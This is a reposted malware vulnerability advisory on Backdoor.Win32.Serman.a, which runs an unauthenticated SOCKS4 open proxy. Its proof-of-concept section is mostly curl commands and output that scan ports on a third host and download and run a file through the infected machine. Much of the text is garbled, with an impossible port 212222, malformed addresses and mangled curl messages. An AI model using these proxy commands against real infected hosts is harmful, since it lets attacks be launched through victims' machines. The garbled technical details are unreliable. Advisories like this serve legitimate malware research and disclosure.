![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/f312e3a436995b86b205a1a37b1bf10f.txt
Contact: [email protected]
Media: twitter.com/malvuln
Backup media: infosec.exchange/@malvuln
Threat: Backdoor.Win32.Serman.a
Vulnerability to an Unauthenticated Open Proxy
Serman Family
Type: PE32
MD5: f312e3a436995b86b205a1a37b1bf10f
Vuln ID: MVID-2022 – 0659
Disclosure: 11/22/2022
Description: Malware listens to TCP port 212222 default, but this can be modified. An attacker who is able to connect to infected systems can send requests to it from their original connections. An attacker may be able launch attacks or download files from third-party systems. This will make it appear that the attack originated on this infected host.
E.g. using port 5555
Socks4 version 4A server beta
autor: Stanimir Jordanov * e-mail: [email protected]
Usage: socks4 [LogFile]
C:dump>wwm.exe 5555 out.txt
SOCKS 4 service started: redirecting localhost:5555
To end, press Ctrl+C
Connecting to:
Connected with: 192.168.18.128.80 ID:2C34
Closed ID:2C34
Connecting to:
Connected with: 192.168.18.128.80 ID:25BC
Connect closed ID:25BC
Connecting to:
Connected with: 192.168.18.128.80 ID:A4
A4: Connection Closed ID
Exploit/PoC:
Scan port
Connecting to:
Could not connect to:
Connecting to:
Connected with: 192.168.18.128.21 ID:2DE4
Connect closed ID:2DE4
(Port scan):
(Port closed):
C:UsersggDesktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:666 -v
* Trying 192.168.18.125:5555…
* SOCKS4 communication with 192.168.18.128.666
* SOCKS4 connects to IPv4 at 192.168.18.128.28 (locally solved)
* Could not complete SOCKS4 connection with 0.0.0.0.0. Request rejected (91), or not fulfilled.
* Closest connection 0.
curl: (97). Cannot complete SOCKS4 connection with 0.0.0.0.0. Request rejected, or not received.
(Port open):
C:UsersggDesktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:21 -v
* Trying 192.168.18.125:5555…
* SOCKS4 communication with 192.168.18.128.21
* SOCKS4 connects to IPv4 at 192.168.18.128.28 (locally solved)
* Socks4 request accepted.
* Connection to 192.168.18.125 (#1) port 5555
> GET / HTTP/1.1
> Host: 192.168.18.128:21
> User-Agent: curl/7.83.1
> Accept: */*
>
* Received HTTP/0.9 even though it was not permitted
* Closest connection 0.
Curl: (1) Received HTTP/0.9 When Not Allowable
(Download files):
C:UsersggDesktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128/DOOM.exe -v –output 2.txt
* Trying 192.168.18.125:5555…
% Total Received % Average Speed Time Time
Dload Upload Total Spent Left Speed
0/0 0/0 HTML3_ 0* SOCKS4 communications to 192.168.18.128.80
* SOCKS4 connects to IPv4 at 192.168.18.128.28 (locally solved)
* Socks4 request accepted.
* Connection to 192.168.18.125 (#1) port 5555
GET /DOOM.exe HTTP/1.1
Host: 192.168.18.128
User-Agent: curl/7.83.1
Accept: */*
* Not supporting multiuse, mark bundle
* HTTP 1.0, assume close after body
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.6
Date: Tue, 22 Nov 2022 02:15:31 GMT
Content-type: application/x-msdos-program
Content-Length: 103533
Last Modified Sat, 03/08/2019 04:57 PM GMT
{ [6794 bytes data]
100 101k 100 101k 0 0 474k 0 –:–:– –:–:– –:–:– 488k
* Closest connection 0.
C:UsersggDesktop>2.txt
DOOMED!! !
To continue, press any key. . .
Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. All content copyrighted (c) Malvuln.comTM
